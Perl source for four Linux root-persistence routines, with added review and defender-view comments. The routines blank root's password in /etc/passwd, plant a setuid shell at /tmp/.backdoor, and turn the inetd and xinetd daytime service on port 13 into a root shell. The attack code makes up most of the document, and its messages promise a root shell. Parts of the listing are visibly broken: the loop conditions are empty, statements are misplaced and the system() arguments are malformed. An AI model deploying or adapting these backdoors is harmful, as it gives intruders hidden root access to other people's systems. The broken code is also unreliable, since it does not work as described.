# rushroot: persistence routine aimed at the root record of /etc/passwd.
# It opens the file on the bareword handle PWD, compares $passwd with the
# literal "root:x:0:0:root:/root:/bin/bash", strips the "x" password
# placeholder on a match, then reopens /etc/passwd for writing (which
# truncates it) and prints $passwd followed by $passwd1.
# Takes no arguments. $passwd and $passwd1 are not declared in this block.
# NOTE(review): both while() conditions are empty in this listing (possibly
# lost when the page was extracted), so as shown nothing is read from PWD.
# Defender view: the state this aims for is a UID 0 account with an empty
# password field. Watch writes to /etc/passwd (file-integrity monitoring,
# audit rules), check periodically for empty password fields, and keep PAM
# from accepting null passwords (no "nullok").
sub rushroot
{
# Two-argument open; the die text says "shadow file" but the path opened is
# /etc/passwd.
open (PWD,"/etc/passwd") || die "cannt find the shadow file!\n";
while()
{
chop;
$passwd.="$_\n";
# Leaves the loop after a single pass, so only one record lands in $passwd.
last;
}
chomp $passwd;
# Exact string comparison: any other root record (different shell, GECOS or
# home directory) takes the else branch.
if($passwd eq "root:x:0:0:root:/root:/bin/bash")
{
# Removes every "x" in the string; in the literal compared above the only
# "x" is the password placeholder, leaving the field empty.
$passwd =~s/x//g;
print "rushroot success!now you can get a rootshell with null passwd";
}
else
{
print "faild....something wrong....:(((";
}
# Accumulates into $passwd1, which is written back after $passwd below.
while()
{
chomp;
$passwd1.="$_\n";
}
close PWD;
# ">" mode truncates /etc/passwd before the two prints below; this happens
# in both branches of the if above.
open (PWD,">/etc/passwd")||die "why?";
print PWD $passwd;
print PWD $passwd1;
}
# fakebackdoor: builds two argument lists and passes each to system() in
# list form: "cp" with a string naming /bin/sh and /tmp/.backdoor, and
# "chmod" with a string naming u+s and /tmp/.backdoor. Judging by the
# printed message, the aim is a setuid copy of the shell under /tmp.
# Takes no arguments. The return values of system() are not checked, so the
# "success" line is printed whatever the two commands did.
# Defender view: hunt for setuid/setgid files in /tmp and other
# world-writable directories, mount /tmp with nosuid, and alert on chmod
# calls that set the setuid bit outside package management.
sub fakebackdoor
{
@cpsh = ("cp", "/bin/sh /tmp/.backdoor");
@chmod= ("chmod","u+s /tmp/.backdoor");
# List-form system(): each array is the full argument vector for one command.
system(@cpsh);
system(@chmod);
print "success! now you can use ./tmp/.backdoor to get a root shell\n";
}
# rushport1: targets the inetd configuration at /etc/inetd.d/inetd.conf.
# It compares $passwd with the literal daytime entry
# "daytime stream tcp nowait root internal" and, on a match, replaces
# "root internal" with "bin/sh -i", i.e. it swaps the built-in daytime
# handler for an interactive shell.
# Takes no arguments. $passwd is not declared in this block; rushroot uses
# the same variable name.
# NOTE(review): the while() condition is empty in this listing, and the
# close / reopen-for-write / print statements follow `last;` inside the same
# loop body. The listing may be damaged, so treat it as a description of
# intent rather than of working behaviour.
# Defender view: review inetd/xinetd entries whose server field is a shell
# or interpreter, disable legacy small services such as daytime (port 13),
# and put the inetd configuration under file-integrity monitoring.
sub rushport1
{
open (RH6,"/etc/inetd.d/inetd.conf") || die "cannt find the shadow file!\n"; # the path here can be changed to suit the system version
while()
{
chomp;
$passwd.="$_\n";
chomp $passwd;
# Exact match on the stock daytime line; any other spacing or field values
# leave $passwd unchanged.
if ($passwd eq "daytime stream tcp nowait root internal")
{
$passwd =~s/root internal/bin\/sh -i/g;
}
last;
close RH6;
# ">" mode would truncate the configuration file before $passwd is written.
open (RH6,">/etc/inetd.d/inetd.conf")||die "faild...:("; # the path here can be changed to suit the system version
print RH6 $passwd;
print "success! now you can telnet romote host at port 13 after reboot the daytime session\n";
}
}
# rushport2: xinetd counterpart of rushport1. It opens
# /etc/xinetd.d/daytime for writing (truncating any existing file) and
# writes a "service daytime" stanza, stored in $daytime, whose fields
# include disable = no, server =/bin/sh, user = root, socket_type = stream
# and protocol = tcp.
# Takes no arguments. The DAYTIME handle is not closed explicitly in this
# block.
# Defender view: audit /etc/xinetd.d for service files whose server is a
# shell or interpreter running as root, alert on changes to that directory,
# and remove xinetd where no legacy service needs it.
sub rushport2
{
open (DAYTIME,">/etc/xinetd.d/daytime") || die "can't open file!";
# The stanza text is written exactly as spelled in this string.
$daytime = "service daytime\n {\n disable = no\n server =/bin/sh\n server_agrs = --norc\n id = daytime-stream\n socket_type = stream\n protocol = tcp\n user = root\n wait = no\n }\n";
print DAYTIME $daytime;
print "success! now you can telnet romote host at port 13 after reboot the daytime session\n";
}